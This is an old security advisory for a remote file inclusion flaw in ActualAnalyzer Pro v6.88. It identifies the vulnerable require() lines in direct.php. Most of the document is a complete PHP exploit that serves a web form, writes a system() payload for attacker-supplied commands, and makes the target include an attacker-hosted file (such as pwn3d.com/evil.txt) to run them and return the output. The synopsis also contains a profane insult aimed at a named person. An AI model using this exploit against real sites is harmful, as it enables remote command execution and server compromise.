ActualAnalyzer688.txt

`=======================================================================================  
XOR Crew :: Security Advisory   
4/10/2006  
=======================================================================================  
ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability  
=======================================================================================  
http://www.xorcrew.net/  
http://www.xorcrew.net/ReZEN  
=======================================================================================  
  
:: Summary  
  
Vendor : ActualScripts  
Vendor Site : http://www.actualscripts.com/  
Product(s) : ActualAnalyzer Pro v6.88  
Version(s) : All  
Severity : Medium/High  
Impact : Remote Command Execution  
Release Date : 4/10/2006  
Credits : ReZEN (rezen (a) xorcrew (.) net)  
  
=======================================================================================  
  
I. Description  
  
Pro Edition — the professional solution for medium and large business   
web sites. The  
ability to collect high detailed statistics about each separate page of   
web site will  
help you effectively manage the overall Internet strategy and direction   
of company,  
successfully optimize and develop him.  
  
=======================================================================================  
  
II. Synopsis  
  
FUCK YOU 'ASHTETICO' 0hday releasing wh0re.  
  
There is a remote file inclusion vulnerability that allows for remote   
command execution  
in the /direct.php file. The bug is here on lines 5-8:  
  
if(!isset($rf)) $rf='./';  
  
require $rf.'common/error.php';  
require $rf.'common/global.php';  
require $rf.'common/config.php';  
require $rf.'common/dbaccess.php';  
  
the $rf variable is not set prior to being used in the require() function.  
The vendor and support team have been contacted.  
  
=======================================================================================  
  
Exploit code:  
  
-----BEGIN-----  
  
<?php  
/*  
ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN  
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K  
url: http://www.xorcrew.net/ReZEN  
  
example:  
turl: http://www.target.com/path to actualanalyzer/direct.php?rf=  
hurl: http://www.pwn3d.com/evil.txt?  
  
*/  
  
$cmd = $_POST["cmd"];  
$turl = $_POST["turl"];  
$hurl = $_POST["hurl"];  
  
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"  
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"   
value=\"".$turl."\"><br>"  
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"   
value=\"".$hurl."\"><br>"  
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"   
value=\"".$cmd."\"><br>"  
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"  
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";  
  
if (!isset($_POST['submit']))  
{  
  
echo $form;  
  
}else{  
  
$file = fopen ("test.txt", "w+");  
  
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");  
system(\"echo ++END++\"); ?>");  
fclose($file);  
  
$file = fopen ($turl.$hurl, "r");  
if (!$file) {  
echo "<p>Unable to get output.\n";  
exit;  
}  
  
echo $form;  
  
while (!feof ($file)) {  
$line .= fgets ($file, 1024)."<br>";  
}  
$tpos1 = strpos($line, "++BEGIN++");  
$tpos2 = strpos($line, "++END++");  
$tpos1 = $tpos1+strlen("++BEGIN++");  
$tpos2 = $tpos2-$tpos1;  
$output = substr($line, $tpos1, $tpos2);  
echo $output;  
  
}  
?>  
  
  
------END------  
  
=======================================================================================  
  
IV. Greets :>  
  
All of xor, Infinity, stokhli, ajax, gml, D2K  
  
=======================================================================================  
  
`